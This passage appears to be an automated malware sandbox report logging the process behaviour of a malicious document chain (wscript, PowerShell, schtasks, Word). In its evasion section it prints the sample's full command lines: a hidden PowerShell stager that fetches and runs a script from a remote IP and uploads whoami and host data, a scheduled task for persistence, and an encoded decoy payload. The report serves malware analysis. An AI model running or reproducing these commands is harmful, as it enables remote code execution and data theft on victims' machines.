              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4092Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5721Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5033Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4720Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704Thread sleep time: -12912720851596678s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 3908Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5640Thread sleep time: -17524406870024063s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: svchost.exe, 0000000A.00000002.3430723611.0000023B7184F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 0000000A.00000002.3427774165.0000023B6C02B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp<
              Source: powershell.exe, 0000000E.00000002.3045473811.0000020A4252E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3018%SystemRoot%\system32\mswsock.dll0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}
              Encrypted powershell cmdline option found
              Source: unknownProcess created: Base64 decoded o+^j]jEnwhs
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\appdata\local\temp\Return.docx" /o ""Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /fJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsSpQbSOGHyzMLxZ/page164/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='uesdbbqacagiaf0nbfcaaaaaaaaaaaaaaaalaaaax3jlbhmvlnjlbhotkk1la0emhu/9fupu3wwrimjo9ijcbyl1b4sz7o7qzgczaa3/3kekulckome8efpwhnjtzv6gtpyli0hdqmlbctdrujbqens9lx9g0y+6vz6q1eqzxcqq3osiyrjjj4jftoypndfxqjshzk9sxzxiironkxhdtveyfzkgnzhv1mriw7sctfti/dc2ehayjiqmzl6mxk+zoc4vtnlk0wcjealx+wo0lqx4xwj9e6e4dm7wuzrhz0gueffzofi2t5uopvtgd/9png98y7zhbnfe4ovnospzg/sfueshcojqaspzaaaapqiaafblawquaagicabdjwrxaaaaaaaaaaaaaaaaeqaaagrvy1byb3bzl2nvcmuueg1sbvjbs8mwfh73v5s8t+kfzzs2a5u9ora2uxylyvkxbdkqnk3bvzdtt7rhoa/nu/q7oscp5gfvbhuwtra6jekukwa0b4xudune1otwrgkhtavwtbpkcgrh5tvdwu3owwuvtjvguyilfjb2otcl2skanflht6cyi7xde3htwsxqq1ttw/gpq4gmcfxafsatdbnta0mzjzjtpobtpnnzzggqneidcjq6mkqj/fmiwovu/jaof04l8wjgpvustu6dk5ox67qoywarp39cp5yvq2huuop+vrxivqiecwsmw1sv9bl4wodjvhr0kx/fk8ljhul65/dtgq7fvonlovrnn8zh0t/rroj4ppqmg9xpe7k6cyefir8hpkvv2dpzekgqne6zmj6fcbzos/x+5r/pvul1wndzwl72t6vkhqyt7e/tdl/fwhecaqk+roknjps5/pd8ql9qswci1kkz4vibaackagaauesdbbqacagiaf0nbfcaaaaaaaaaaaaaaaaqaaaazg9juhjvchmvyxbwlnhtbj1r0w6dibr931cys9ekurw2ottllj01wzo5dm8n4lvzfajqpv37stzzpg9e7rnnca5wyeyy9mezjbvkrsmkismajfe1ko06/chfz0uywmdkzxolyr1ewyyb+kb2rmkwtoanvio067bztq8qsrydgdni09izjtidcx6afqmmerxefd8nib3cczwjudiqndqzprqgd8fv2f3xtfb85352x16196okheh3zael6k8slwn9kqagsw+pgdxp3qvonp8ruhwvgbdbbfpemd/4csvk6xl8lpjjngytwde/4qu4q5wvdsxsnoicf3hwydyvlgzp52nff0mrskrivzmbqdoon9z9fra0yalyr5vgt0d2ravlmuh3ghyuqs1nigvb95i8d8ww7vwbmus5v04ae/igxpeugfcmytjjp7ij5fmmaw3tnaxplxwehoztot9qswcilvvkq0sbaabdagaauesdbbqacagiaf0nbfcaaaaaaaaaaaaaaaacaaaad29yzc9fcmvscy9kb2n1bwvudc54bwwucmvsc62rtqrcmbcf954izn6mvrcrpm5eccv1adgdtse2cckoensdiloo4sll/h3vms9fx/uoxdahby2alembovg20qyrcci30ywsi0m+x05sxamtdohfgxmeteruxxlqlfyyjnahizpa+l5slh3dnvqn2scfpemc+08gfamm21uc/k7kgju3h7+wbv1rhrurzj0agphggw4dhkiuvkes8kityae+lj/7p3xtdzxy2ohbwav1zct8rz9aopjl5xeenaefsc4h4rz3ueshcpkvmmdfaaaaewiaafblawquaagicabdjwrxaaaaaaaaaaaaaaaaeqaaahdvcmqvzg9jdw1lbnqueg1s7v1bb9tgfn7fxzhqq7elkbj1ssyrlytugnqdpefqp+hjqfguxf1s1jkuzffjjpqkbyi6yayukl2kws5291h2rrusxwrslxj+hf0le84msv0sjbzkxyi1tiusm3moz4bfmxpmduattzcmnayrlq2z9wislzbirk0rzlmrv4uxr+7dvjapedur62vzn+tqmbap2rfpv3/1satqnpwmodydahzqdsesxppwvwarndwq7wugplimbvaca4ppfmxkrvnu7xlzkkxiroy4juiy6relzizah7ikarmya49wncljbnjvsqylkze0vf12il92twvyprf1d71/3dd9dk2zvlvlwuwgzsqqbunfgdp/ryfr9ybnsjpdgzfpqne4y5vlltwaeovwrm7wyd5h+xtlibsjyizxe4wl8etji/zwanjd7xorzsbtc8tsnnxuhnkw0hqy9ydma2usav+0pomas8kk3s9ukjtbrkbrbdp+a/hjlz2pqtpgycifw9w6acklhsqjckkweaq4xlzboepmerovdfzz12kxnwdtv0mrsc7rxdgdrdo9lmsptblmh0s8yg7ichqvqnwtrn7zxleog7lixlygyiydlfchpmjxujeqhusko1obe61extrqxfgila1a8+9rcr3kwgyv8e8vpwskskdq8vcl5926adydg19gk5pwjn3tdnumd9qw+di05drj91ndhh+jyrbzma3jyymv+3qwrxt2q5i6afkzk5uoovo9q5x2jr+qznshnaybiqb71eezdvvmrux6zuwg38kav+5zl2gauppubon9xvbjwwvnlb5y2/q1pah7tepol3jj7rrb7gp6lgw4w/seqgqpng/xl2bqaimazg0jl4dz5dupsc+whxrs7woogcq7ihripgkaww09dj/qy7i+iroiek2p4p6yiwumbugadeekt0bekzb2if8aedaqmnflbbvf0s5ehbs7cclivkn+qqauvqc0gd9pxs
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsspqbsoghyzmlxz/page164/upgrade.txt');if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$bjdo+=iex $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://147.78.46.40:37662/xsspqbsoghyzmlxz/page164/upgrade.txt');if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$bjdo+=iex $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://147.78.46.40:43891/page164',$drpy);}Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
